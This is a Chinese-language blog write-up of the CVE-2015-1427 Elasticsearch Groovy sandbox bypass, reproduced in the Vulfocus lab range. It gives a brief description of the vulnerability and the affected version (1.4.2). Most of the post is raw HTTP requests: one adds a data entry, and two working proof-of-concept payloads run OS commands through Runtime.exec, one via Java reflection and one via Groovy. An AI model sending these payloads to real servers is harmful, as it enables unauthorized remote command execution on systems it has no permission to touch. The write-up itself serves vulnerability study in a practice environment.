Vulfocus靶场 | elasticsearch 代码执行 (CVE-2015-1427)

一、漏洞简介

CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。

二、漏洞影响

elasticsearch版本:v1.4.2

三、漏洞复现

ElasticSearch支持使用“在沙盒中的”Groovy语言作为动态脚本,但显然官方的工作并没有做好。lupin和tang3分别提出了两种执行命令的方法:

既然对执行Java代码有沙盒,lupin的方法是想办法绕过沙盒,比如使用Java反射
Groovy原本也是一门语言,于是tang3另辟蹊径,使用Groovy语言支持的方法,来直接执行命令,无需使用Java语言

所以,根据这两种执行漏洞的思路,我们可以获得两个不同的POC。

发送如下数据包, 增加一个数据  

POST /website/blog/  HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 30

{
	  "name": "guiltyfet"
}

 

  "name" :  "guiltyfet"
} 

 

POC1

利用反射机制执行JAVA代码Payload:  

POST /_search?pretty HTTP/1.1
Host: 
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 491

{
    "size":1,
    "script_fields": {
        "test#": {  
            "script":

             "java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"ls /tmp\").getInputStream())).readLines()",

            "lang": "groovy"
        }
    }

}

 

 

 

 

POC2

利用Groovy语言执行命令

POST /_search?pretty HTTP/1.1
Host: 
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 163

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"ls /tmp\").getText()"}}}

  

 

 

 

 

 

 

posted @ 2022-08-14 12:02  mlxwl  阅读(258)  评论(0编辑  收藏  举报